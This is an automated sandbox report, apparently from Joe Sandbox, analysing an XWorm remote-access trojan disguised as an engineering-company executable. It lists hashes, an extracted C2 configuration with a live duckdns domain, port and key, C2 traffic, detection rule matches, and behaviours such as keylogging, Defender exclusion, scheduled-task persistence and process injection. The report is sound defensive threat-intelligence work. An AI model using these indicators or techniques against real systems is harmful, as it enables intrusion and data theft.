Windows Analysis Report
SS Bottmac Engineers Pvt. Ltd..exe

Overview

General Information

Sample name:	SS Bottmac Engineers Pvt. Ltd..exe
Analysis ID:	1545926
MD5:	ff9e45d7326698f34526793bf1244811
SHA1:	b3ff69abfe1c5e6633a866ffbebe2139a69e3f0a
SHA256:	4db566fcdc413fe50153dc8431ae86192241f0e1e86071f80d42eb6e0fb5baca
Tags:	exeuser-lowmal3
Infos:

Detection

XWorm

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Found malware configuration

Malicious sample detected (through community Yara rule)

Multi AV Scanner detection for dropped file

Multi AV Scanner detection for submitted file

Sigma detected: Scheduled temp file as task from temp location

Suricata IDS alerts for network traffic

Yara detected AntiVM3

Yara detected XWorm

.NET source code contains method to dynamically call methods (often used by packers)

.NET source code contains potential unpacker

AI detected suspicious sample

Adds a directory exclusion to Windows Defender

Bypasses PowerShell execution policy

C2 URLs / IPs found in malware configuration

Contains functionality to log keystrokes (.Net Source)

Injects a PE file into a foreign processes

Loading BitLocker PowerShell Module

Machine Learning detection for dropped file

Machine Learning detection for sample

Sample uses string decryption to hide its real strings

Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet

Uses dynamic DNS services

Uses schtasks.exe or at.exe to add and modify task schedules

Yara detected Generic Downloader

AV process strings found (often used to terminate AV products)

Abnormal high CPU Usage

Allocates memory with a write watch (potentially for evading sandboxes)

Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)

Contains long sleeps (>= 3 min)

Creates a process in suspended mode (likely to inject code)

Creates a start menu entry (Start Menu\Programs\Startup)

Detected TCP or UDP traffic on non-standard ports

Detected potential crypto function

Drops PE files

Enables debug privileges

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Internet Provider seen in connection with other malware

May sleep (evasive loops) to hinder dynamic analysis

PE / OLE file has an invalid certificate

Queries the volume information (name, serial number etc) of a device

Sample execution stops while process was sleeping (likely an evasion)

Sample file is different than original file name gathered from version info

Sigma detected: Change PowerShell Policies to an Insecure Level

Sigma detected: CurrentVersion Autorun Keys Modification

Sigma detected: Powershell Defender Exclusion

Sigma detected: Startup Folder File Write

Sigma detected: Suspicious Add Scheduled Task Parent

Sigma detected: Suspicious Schtasks From Env Var Folder

Stores files to the Windows start menu directory

Uses 32bit PE files

Uses code obfuscation techniques (call, push, ret)

Yara signature match

Classification

Malware Threat Intel
Provided by

Name	Description	Attribution	Blogpost URLs	Link
XWorm	Malware with wide range of capabilities ranging from RAT to ransomware.	No Attribution	https://any.run/cybersecurity-blog/xworm-malware-communication-analysis/ https://any.run/cybersecurity-blog/xworm-technical-analysis-of-a-new-malware-version/ https://blog.cyble.com/2022/08/19/evilcoder-project-selling-multiple-dangerous-tools-online/ https://cert.pl/en/posts/2023/10/deworming-the-xworm/ https://embee-research.ghost.io/infrastructure-analysis-with-dns-pivoting/	https://malpedia.caad.fkie.fraunhofer.de/details/win.xworm

Signatures

AV Detection

Found malware configuration

Source: 00000000.00000002.2073252953.00000000032B2000.00000004.00000800.00020000.00000000.sdmp

Malware Configuration Extractor: Xworm {"C2 url": ["kanrplest.duckdns.org"], "Port": "4068", "Aes key": "<123456789>", "SPL": "<Xwormmm>", "Install file": "USB.exe", "Version": "XWorm V3.1"}

Multi AV Scanner detection for dropped file

Source: C:\Users\user\AppData\Roaming\RTUZKYTc.exe	ReversingLabs: Detection: 39%
Source: C:\Users\user\AppData\Roaming\SS Bottmac Engineers Pvt. Ltd..exe	ReversingLabs: Detection: 39%

Multi AV Scanner detection for submitted file

Source: SS Bottmac Engineers Pvt. Ltd..exe

ReversingLabs: Detection: 39%

AI detected suspicious sample

Source: Submited Sample

Integrated Neural Analysis Model: Matched 100.0% probability

Machine Learning detection for dropped file

Source: C:\Users\user\AppData\Roaming\RTUZKYTc.exe	Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Roaming\SS Bottmac Engineers Pvt. Ltd..exe	Joe Sandbox ML: detected

Machine Learning detection for sample

Source: SS Bottmac Engineers Pvt. Ltd..exe

Joe Sandbox ML: detected

Sample uses string decryption to hide its real strings

Source: 10.2.RTUZKYTc.exe.319a66c.0.raw.unpack	String decryptor: kanrplest.duckdns.org
Source: 10.2.RTUZKYTc.exe.319a66c.0.raw.unpack	String decryptor: 4068
Source: 10.2.RTUZKYTc.exe.319a66c.0.raw.unpack	String decryptor: <123456789>
Source: 10.2.RTUZKYTc.exe.319a66c.0.raw.unpack	String decryptor: <Xwormmm>
Source: 10.2.RTUZKYTc.exe.319a66c.0.raw.unpack	String decryptor: USB.exe

Uses 32bit PE files

Source: SS Bottmac Engineers Pvt. Ltd..exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: SS Bottmac Engineers Pvt. Ltd..exe

Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Source:	Binary string: OPHt.pdb source: SS Bottmac Engineers Pvt. Ltd..exe, RTUZKYTc.exe.0.dr, SS Bottmac Engineers Pvt. Ltd..exe.9.dr
Source:	Binary string: OPHt.pdbSHA256 source: SS Bottmac Engineers Pvt. Ltd..exe, RTUZKYTc.exe.0.dr, SS Bottmac Engineers Pvt. Ltd..exe.9.dr

Networking

Suricata IDS alerts for network traffic

Source: Network traffic	Suricata IDS: 2855924 - Severity 1 - ETPRO MALWARE Win32/XWorm V3 CnC Command - PING Outbound : 192.168.2.5:50014 -> 104.223.35.76:4068
Source: Network traffic	Suricata IDS: 2853193 - Severity 1 - ETPRO MALWARE Win32/XWorm V3 CnC Command - PING Outbound : 192.168.2.5:50035 -> 104.223.35.76:4068

C2 URLs / IPs found in malware configuration

Source: Malware configuration extractor

URLs: kanrplest.duckdns.org

Uses dynamic DNS services

Source: unknown

DNS query: name: kanrplest.duckdns.org

Yara detected Generic Downloader

Source: Yara match	File source: 0.2.SS Bottmac Engineers Pvt. Ltd..exe.32cd6ac.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.SS Bottmac Engineers Pvt. Ltd..exe.32c45d0.1.raw.unpack, type: UNPACKEDPE

Detected TCP or UDP traffic on non-standard ports

Source: global traffic

TCP traffic: 192.168.2.5:49764 -> 104.223.35.76:4068

Internet Provider seen in connection with other malware

Source: Joe Sandbox View

ASN Name: ASN-QUADRANET-GLOBALUS ASN-QUADRANET-GLOBALUS

Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1

Source: global traffic

DNS traffic detected: DNS query: kanrplest.duckdns.org

Source: SS Bottmac Engineers Pvt. Ltd..exe, RTUZKYTc.exe.0.dr, SS Bottmac Engineers Pvt. Ltd..exe.9.dr	String found in binary or memory: http://crl.comodoca.com/COMODORSACertificationAuthority.crl0q
Source: SS Bottmac Engineers Pvt. Ltd..exe, RTUZKYTc.exe.0.dr, SS Bottmac Engineers Pvt. Ltd..exe.9.dr	String found in binary or memory: http://crl.comodoca.com/COMODORSACodeSigningCA.crl0t
Source: powershell.exe, 0000000C.00000002.2130664829.00000000033AD000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.micro
Source: powershell.exe, 0000000C.00000002.2139010974.000000000600C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.2191476893.000000000608C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.2261845136.00000000057DB000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://nuget.org/NuGet.exe
Source: SS Bottmac Engineers Pvt. Ltd..exe, RTUZKYTc.exe.0.dr, SS Bottmac Engineers Pvt. Ltd..exe.9.dr	String found in binary or memory: http://ocsp.comodoca.com0
Source: powershell.exe, 00000014.00000002.2240731614.00000000048C6000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://pesterbdd.com/images/Pester.png
Source: powershell.exe, 0000000C.00000002.2131938852.00000000050F8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.2178385640.0000000005178000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.2240731614.00000000048C6000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/
Source: SS Bottmac Engineers Pvt. Ltd..exe, 00000000.00000002.2073252953.00000000032B2000.00000004.00000800.00020000.00000000.sdmp, SS Bottmac Engineers Pvt. Ltd..exe, 00000009.00000002.4528212796.0000000003341000.00000004.00000800.00020000.00000000.sdmp, RTUZKYTc.exe, 0000000A.00000002.2150760883.0000000003182000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2131938852.0000000004FA1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.2178385640.0000000005021000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.2240731614.0000000004771000.00000004.00000800.00020000.00000000.sdmp, SS Bottmac Engineers Pvt. Ltd..exe, 00000016.00000002.2388435834.0000000003161000.00000004.00000800.00020000.00000000.sdmp, SS Bottmac Engineers Pvt. Ltd..exe, 0000001B.00000002.2469960785.0000000003682000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: powershell.exe, 0000000C.00000002.2131938852.00000000050F8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.2178385640.0000000005178000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.2240731614.00000000048C6000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/wsdl/
Source: SS Bottmac Engineers Pvt. Ltd..exe, RTUZKYTc.exe.0.dr, SS Bottmac Engineers Pvt. Ltd..exe.9.dr	String found in binary or memory: http://tempuri.org/DataSet1.xsd
Source: powershell.exe, 00000014.00000002.2240731614.00000000048C6000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
Source: powershell.exe, 0000000C.00000002.2131938852.0000000004FA1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.2178385640.0000000005021000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.2240731614.0000000004771000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://aka.ms/pscore6lB
Source: powershell.exe, 00000014.00000002.2261845136.00000000057DB000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/
Source: powershell.exe, 00000014.00000002.2261845136.00000000057DB000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/Icon
Source: powershell.exe, 00000014.00000002.2261845136.00000000057DB000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/License
Source: powershell.exe, 00000014.00000002.2240731614.00000000048C6000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://github.com/Pester/Pester
Source: powershell.exe, 0000000C.00000002.2139010974.000000000600C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.2191476893.000000000608C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.2261845136.00000000057DB000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://nuget.org/nuget.exe
Source: SS Bottmac Engineers Pvt. Ltd..exe, RTUZKYTc.exe.0.dr, SS Bottmac Engineers Pvt. Ltd..exe.9.dr	String found in binary or memory: https://www.chiark.greenend.org.uk/~sgtatham/putty/0

Key, Mouse, Clipboard, Microphone and Screen Capturing

Contains functionality to log keystrokes (.Net Source)

Source: 0.2.SS Bottmac Engineers Pvt. Ltd..exe.32c45d0.1.raw.unpack, XLogger.cs	.Net Code: KeyboardLayout
Source: 0.2.SS Bottmac Engineers Pvt. Ltd..exe.32cd6ac.0.raw.unpack, XLogger.cs	.Net Code: KeyboardLayout

System Summary

Malicious sample detected (through community Yara rule)

Source: 10.2.RTUZKYTc.exe.319a66c.0.unpack, type: UNPACKEDPE	Matched rule: Detects AsyncRAT Author: ditekSHen
Source: 0.2.SS Bottmac Engineers Pvt. Ltd..exe.32c45d0.1.unpack, type: UNPACKEDPE	Matched rule: Detects AsyncRAT Author: ditekSHen
Source: 27.2.SS Bottmac Engineers Pvt. Ltd..exe.369a894.0.raw.unpack, type: UNPACKEDPE	Matched rule: Detects AsyncRAT Author: ditekSHen
Source: 27.2.SS Bottmac Engineers Pvt. Ltd..exe.36917b8.1.raw.unpack, type: UNPACKEDPE	Matched rule: Detects AsyncRAT Author: ditekSHen
Source: 27.2.SS Bottmac Engineers Pvt. Ltd..exe.36917b8.1.unpack, type: UNPACKEDPE	Matched rule: Detects AsyncRAT Author: ditekSHen
Source: 10.2.RTUZKYTc.exe.3191590.1.unpack, type: UNPACKEDPE	Matched rule: Detects AsyncRAT Author: ditekSHen
Source: 10.2.RTUZKYTc.exe.319a66c.0.raw.unpack, type: UNPACKEDPE	Matched rule: Detects AsyncRAT Author: ditekSHen
Source: 16.2.RTUZKYTc.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Detects AsyncRAT Author: ditekSHen
Source: 0.2.SS Bottmac Engineers Pvt. Ltd..exe.32cd6ac.0.unpack, type: UNPACKEDPE	Matched rule: Detects AsyncRAT Author: ditekSHen
Source: 22.2.SS Bottmac Engineers Pvt. Ltd..exe.3177a6c.1.raw.unpack, type: UNPACKEDPE	Matched rule: Detects AsyncRAT Author: ditekSHen
Source: 27.2.SS Bottmac Engineers Pvt. Ltd..exe.369a894.0.unpack, type: UNPACKEDPE	Matched rule: Detects AsyncRAT Author: ditekSHen
Source: 10.2.RTUZKYTc.exe.3191590.1.raw.unpack, type: UNPACKEDPE	Matched rule: Detects AsyncRAT Author: ditekSHen
Source: 22.2.SS Bottmac Engineers Pvt. Ltd..exe.3177a6c.1.unpack, type: UNPACKEDPE	Matched rule: Detects AsyncRAT Author: ditekSHen
Source: 0.2.SS Bottmac Engineers Pvt. Ltd..exe.32cd6ac.0.raw.unpack, type: UNPACKEDPE	Matched rule: Detects AsyncRAT Author: ditekSHen
Source: 0.2.SS Bottmac Engineers Pvt. Ltd..exe.32c45d0.1.raw.unpack, type: UNPACKEDPE	Matched rule: Detects AsyncRAT Author: ditekSHen
Source: 22.2.SS Bottmac Engineers Pvt. Ltd..exe.316e990.0.unpack, type: UNPACKEDPE	Matched rule: Detects AsyncRAT Author: ditekSHen
Source: 22.2.SS Bottmac Engineers Pvt. Ltd..exe.316e990.0.raw.unpack, type: UNPACKEDPE	Matched rule: Detects AsyncRAT Author: ditekSHen
Source: 00000010.00000002.2163931121.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects AsyncRAT Author: ditekSHen
Source: 00000000.00000002.2073252953.0000000003314000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects AsyncRAT Author: ditekSHen
Source: 00000000.00000002.2073252953.00000000032B2000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects AsyncRAT Author: ditekSHen
Source: 0000000A.00000002.2150760883.00000000031E4000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects AsyncRAT Author: ditekSHen
Source: 0000001B.00000002.2469960785.0000000003682000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects AsyncRAT Author: ditekSHen
Source: 0000000A.00000002.2150760883.0000000003182000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects AsyncRAT Author: ditekSHen
Source: 00000016.00000002.2388435834.0000000003161000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects AsyncRAT Author: ditekSHen
Source: 0000001B.00000002.2469960785.00000000036E4000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects AsyncRAT Author: ditekSHen

Abnormal high CPU Usage

Source: C:\Users\user\Desktop\SS Bottmac Engineers Pvt. Ltd..exe

Process Stats: CPU usage > 49%

Detected potential crypto function

Source: C:\Users\user\Desktop\SS Bottmac Engineers Pvt. Ltd..exe	Code function: 0_2_017C4204	0_2_017C4204
Source: C:\Users\user\Desktop\SS Bottmac Engineers Pvt. Ltd..exe	Code function: 0_2_017CE134	0_2_017CE134
Source: C:\Users\user\Desktop\SS Bottmac Engineers Pvt. Ltd..exe	Code function: 0_2_017C7018	0_2_017C7018
Source: C:\Users\user\Desktop\SS Bottmac Engineers Pvt. Ltd..exe	Code function: 0_2_07860E28	0_2_07860E28
Source: C:\Users\user\Desktop\SS Bottmac Engineers Pvt. Ltd..exe	Code function: 0_2_0786A730	0_2_0786A730
Source: C:\Users\user\Desktop\SS Bottmac Engineers Pvt. Ltd..exe	Code function: 0_2_0786C648	0_2_0786C648
Source: C:\Users\user\Desktop\SS Bottmac Engineers Pvt. Ltd..exe	Code function: 0_2_078630D0	0_2_078630D0
Source: C:\Users\user\Desktop\SS Bottmac Engineers Pvt. Ltd..exe	Code function: 0_2_07863F88	0_2_07863F88
Source: C:\Users\user\Desktop\SS Bottmac Engineers Pvt. Ltd..exe	Code function: 0_2_0786AF93	0_2_0786AF93
Source: C:\Users\user\Desktop\SS Bottmac Engineers Pvt. Ltd..exe	Code function: 0_2_0786AFA0	0_2_0786AFA0
Source: C:\Users\user\Desktop\SS Bottmac Engineers Pvt. Ltd..exe	Code function: 0_2_0786CFF8	0_2_0786CFF8
Source: C:\Users\user\Desktop\SS Bottmac Engineers Pvt. Ltd..exe	Code function: 0_2_07863F77	0_2_07863F77
Source: C:\Users\user\Desktop\SS Bottmac Engineers Pvt. Ltd..exe	Code function: 0_2_07860E21	0_2_07860E21
Source: C:\Users\user\Desktop\SS Bottmac Engineers Pvt. Ltd..exe	Code function: 0_2_07863CEA	0_2_07863CEA
Source: C:\Users\user\Desktop\SS Bottmac Engineers Pvt. Ltd..exe	Code function: 0_2_07863CF0	0_2_07863CF0
Source: C:\Users\user\Desktop\SS Bottmac Engineers Pvt. Ltd..exe	Code function: 0_2_0786AB68	0_2_0786AB68
Source: C:\Users\user\Desktop\SS Bottmac Engineers Pvt. Ltd..exe	Code function: 9_2_031846D0	9_2_031846D0
Source: C:\Users\user\Desktop\SS Bottmac Engineers Pvt. Ltd..exe	Code function: 9_2_03184CC8	9_2_03184CC8
Source: C:\Users\user\Desktop\SS Bottmac Engineers Pvt. Ltd..exe	Code function: 9_2_031813E0	9_2_031813E0
Source: C:\Users\user\Desktop\SS Bottmac Engineers Pvt. Ltd..exe	Code function: 9_2_03181A49	9_2_03181A49
Source: C:\Users\user\AppData\Roaming\RTUZKYTc.exe	Code function: 10_2_01244204	10_2_01244204
Source: C:\Users\user\AppData\Roaming\RTUZKYTc.exe	Code function: 10_2_0124E134	10_2_0124E134
Source: C:\Users\user\AppData\Roaming\RTUZKYTc.exe	Code function: 10_2_01247018	10_2_01247018
Source: C:\Users\user\AppData\Roaming\RTUZKYTc.exe	Code function: 10_2_07777371	10_2_07777371
Source: C:\Users\user\AppData\Roaming\RTUZKYTc.exe	Code function: 10_2_07770E28	10_2_07770E28
Source: C:\Users\user\AppData\Roaming\RTUZKYTc.exe	Code function: 10_2_0777A730	10_2_0777A730
Source: C:\Users\user\AppData\Roaming\RTUZKYTc.exe	Code function: 10_2_0777C648	10_2_0777C648
Source: C:\Users\user\AppData\Roaming\RTUZKYTc.exe	Code function: 10_2_0777C637	10_2_0777C637
Source: C:\Users\user\AppData\Roaming\RTUZKYTc.exe	Code function: 10_2_0777A6FF	10_2_0777A6FF
Source: C:\Users\user\AppData\Roaming\RTUZKYTc.exe	Code function: 10_2_077730D0	10_2_077730D0
Source: C:\Users\user\AppData\Roaming\RTUZKYTc.exe	Code function: 10_2_07773F77	10_2_07773F77
Source: C:\Users\user\AppData\Roaming\RTUZKYTc.exe	Code function: 10_2_0777CFF8	10_2_0777CFF8
Source: C:\Users\user\AppData\Roaming\RTUZKYTc.exe	Code function: 10_2_0777CFE9	10_2_0777CFE9
Source: C:\Users\user\AppData\Roaming\RTUZKYTc.exe	Code function: 10_2_0777AFA0	10_2_0777AFA0
Source: C:\Users\user\AppData\Roaming\RTUZKYTc.exe	Code function: 10_2_0777AF91	10_2_0777AF91
Source: C:\Users\user\AppData\Roaming\RTUZKYTc.exe	Code function: 10_2_07773F88	10_2_07773F88
Source: C:\Users\user\AppData\Roaming\RTUZKYTc.exe	Code function: 10_2_07770E27	10_2_07770E27
Source: C:\Users\user\AppData\Roaming\RTUZKYTc.exe	Code function: 10_2_07773CF0	10_2_07773CF0
Source: C:\Users\user\AppData\Roaming\RTUZKYTc.exe	Code function: 10_2_07773CEB	10_2_07773CEB
Source: C:\Users\user\AppData\Roaming\RTUZKYTc.exe	Code function: 10_2_0777AB68	10_2_0777AB68
Source: C:\Users\user\AppData\Roaming\RTUZKYTc.exe	Code function: 10_2_0777AB58	10_2_0777AB58
Source: C:\Users\user\AppData\Roaming\RTUZKYTc.exe	Code function: 10_2_07777AB8	10_2_07777AB8
Source: C:\Users\user\AppData\Roaming\RTUZKYTc.exe	Code function: 10_2_0E962128	10_2_0E962128
Source: C:\Users\user\AppData\Roaming\RTUZKYTc.exe	Code function: 10_2_0E963678	10_2_0E963678
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 12_2_04E5B4A0	12_2_04E5B4A0
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 12_2_04E5B490	12_2_04E5B490
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 12_2_08E33A98	12_2_08E33A98
Source: C:\Users\user\AppData\Roaming\RTUZKYTc.exe	Code function: 16_2_02AF13E0	16_2_02AF13E0
Source: C:\Users\user\AppData\Roaming\RTUZKYTc.exe	Code function: 16_2_02AF1A49	16_2_02AF1A49
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 17_2_04E7B490	17_2_04E7B490
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 17_2_04E7B470	17_2_04E7B470
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 17_2_08E63E98	17_2_08E63E98
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 20_2_02B3B4A0	20_2_02B3B4A0
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 20_2_02B3B490	20_2_02B3B490
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 20_2_07324408	20_2_07324408
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 20_2_08493A98	20_2_08493A98
Source: C:\Users\user\AppData\Roaming\SS Bottmac Engineers Pvt. Ltd..exe	Code function: 22_2_01644204	22_2_01644204
Source: C:\Users\user\AppData\Roaming\SS Bottmac Engineers Pvt. Ltd..exe	Code function: 22_2_0164E134	22_2_0164E134
Source: C:\Users\user\AppData\Roaming\SS Bottmac Engineers Pvt. Ltd..exe	Code function: 22_2_01647018	22_2_01647018
Source: C:\Users\user\AppData\Roaming\SS Bottmac Engineers Pvt. Ltd..exe	Code function: 22_2_07960E28	22_2_07960E28
Source: C:\Users\user\AppData\Roaming\SS Bottmac Engineers Pvt. Ltd..exe	Code function: 22_2_0796A730	22_2_0796A730
Source: C:\Users\user\AppData\Roaming\SS Bottmac Engineers Pvt. Ltd..exe	Code function: 22_2_0796C648	22_2_0796C648
Source: C:\Users\user\AppData\Roaming\SS Bottmac Engineers Pvt. Ltd..exe	Code function: 22_2_079630D0	22_2_079630D0
Source: C:\Users\user\AppData\Roaming\SS Bottmac Engineers Pvt. Ltd..exe	Code function: 22_2_0796AF91	22_2_0796AF91
Source: C:\Users\user\AppData\Roaming\SS Bottmac Engineers Pvt. Ltd..exe	Code function: 22_2_07963F88	22_2_07963F88
Source: C:\Users\user\AppData\Roaming\SS Bottmac Engineers Pvt. Ltd..exe	Code function: 22_2_0796AFA0	22_2_0796AFA0
Source: C:\Users\user\AppData\Roaming\SS Bottmac Engineers Pvt. Ltd..exe	Code function: 22_2_0796CFF8	22_2_0796CFF8
Source: C:\Users\user\AppData\Roaming\SS Bottmac Engineers Pvt. Ltd..exe	Code function: 22_2_07963F77	22_2_07963F77
Source: C:\Users\user\AppData\Roaming\SS Bottmac Engineers Pvt. Ltd..exe	Code function: 22_2_07960E21	22_2_07960E21
Source: C:\Users\user\AppData\Roaming\SS Bottmac Engineers Pvt. Ltd..exe	Code function: 22_2_07963CF0	22_2_07963CF0
Source: C:\Users\user\AppData\Roaming\SS Bottmac Engineers Pvt. Ltd..exe	Code function: 22_2_07963CEA	22_2_07963CEA
Source: C:\Users\user\AppData\Roaming\SS Bottmac Engineers Pvt. Ltd..exe	Code function: 22_2_0796AB68	22_2_0796AB68
Source: C:\Users\user\AppData\Roaming\SS Bottmac Engineers Pvt. Ltd..exe	Code function: 22_2_093E20F8	22_2_093E20F8
Source: C:\Users\user\AppData\Roaming\SS Bottmac Engineers Pvt. Ltd..exe	Code function: 22_2_093E3648	22_2_093E3648
Source: C:\Users\user\AppData\Roaming\SS Bottmac Engineers Pvt. Ltd..exe	Code function: 26_2_00C413E0	26_2_00C413E0
Source: C:\Users\user\AppData\Roaming\SS Bottmac Engineers Pvt. Ltd..exe	Code function: 26_2_00C41A49	26_2_00C41A49
Source: C:\Users\user\AppData\Roaming\SS Bottmac Engineers Pvt. Ltd..exe	Code function: 27_2_01774204	27_2_01774204
Source: C:\Users\user\AppData\Roaming\SS Bottmac Engineers Pvt. Ltd..exe	Code function: 27_2_0177E134	27_2_0177E134
Source: C:\Users\user\AppData\Roaming\SS Bottmac Engineers Pvt. Ltd..exe	Code function: 27_2_01777018	27_2_01777018
Source: C:\Users\user\AppData\Roaming\SS Bottmac Engineers Pvt. Ltd..exe	Code function: 27_2_07AA0E28	27_2_07AA0E28
Source: C:\Users\user\AppData\Roaming\SS Bottmac Engineers Pvt. Ltd..exe	Code function: 27_2_07AAA730	27_2_07AAA730
Source: C:\Users\user\AppData\Roaming\SS Bottmac Engineers Pvt. Ltd..exe	Code function: 27_2_07AAC648	27_2_07AAC648
Source: C:\Users\user\AppData\Roaming\SS Bottmac Engineers Pvt. Ltd..exe	Code function: 27_2_07AA30D0	27_2_07AA30D0
Source: C:\Users\user\AppData\Roaming\SS Bottmac Engineers Pvt. Ltd..exe	Code function: 27_2_07AAAFA0	27_2_07AAAFA0
Source: C:\Users\user\AppData\Roaming\SS Bottmac Engineers Pvt. Ltd..exe	Code function: 27_2_07AA3F88	27_2_07AA3F88
Source: C:\Users\user\AppData\Roaming\SS Bottmac Engineers Pvt. Ltd..exe	Code function: 27_2_07AAAF91	27_2_07AAAF91
Source: C:\Users\user\AppData\Roaming\SS Bottmac Engineers Pvt. Ltd..exe	Code function: 27_2_07AACFF8	27_2_07AACFF8
Source: C:\Users\user\AppData\Roaming\SS Bottmac Engineers Pvt. Ltd..exe	Code function: 27_2_07AA3F77	27_2_07AA3F77
Source: C:\Users\user\AppData\Roaming\SS Bottmac Engineers Pvt. Ltd..exe	Code function: 27_2_07AA0E21	27_2_07AA0E21
Source: C:\Users\user\AppData\Roaming\SS Bottmac Engineers Pvt. Ltd..exe	Code function: 27_2_07AA3CEA	27_2_07AA3CEA
Source: C:\Users\user\AppData\Roaming\SS Bottmac Engineers Pvt. Ltd..exe	Code function: 27_2_07AA3CF0	27_2_07AA3CF0
Source: C:\Users\user\AppData\Roaming\SS Bottmac Engineers Pvt. Ltd..exe	Code function: 27_2_07AAAB68	27_2_07AAAB68
Source: C:\Users\user\AppData\Roaming\SS Bottmac Engineers Pvt. Ltd..exe	Code function: 27_2_0EC82228	27_2_0EC82228
Source: C:\Users\user\AppData\Roaming\SS Bottmac Engineers Pvt. Ltd..exe	Code function: 27_2_0EC83778	27_2_0EC83778
Source: C:\Users\user\AppData\Roaming\SS Bottmac Engineers Pvt. Ltd..exe	Code function: 31_2_00F513E0	31_2_00F513E0
Source: C:\Users\user\AppData\Roaming\SS Bottmac Engineers Pvt. Ltd..exe	Code function: 31_2_00F51A49	31_2_00F51A49

PE / OLE file has an invalid certificate

Source: SS Bottmac Engineers Pvt. Ltd..exe

Static PE information: invalid certificate

Sample file is different than original file name gathered from version info

Source: SS Bottmac Engineers Pvt. Ltd..exe, 00000000.00000002.2073252953.00000000032B2000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameXClient222.exe4 vs SS Bottmac Engineers Pvt. Ltd..exe
Source: SS Bottmac Engineers Pvt. Ltd..exe, 00000000.00000002.2079413535.00000000059CA000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamePowerShell.EXEj% vs SS Bottmac Engineers Pvt. Ltd..exe
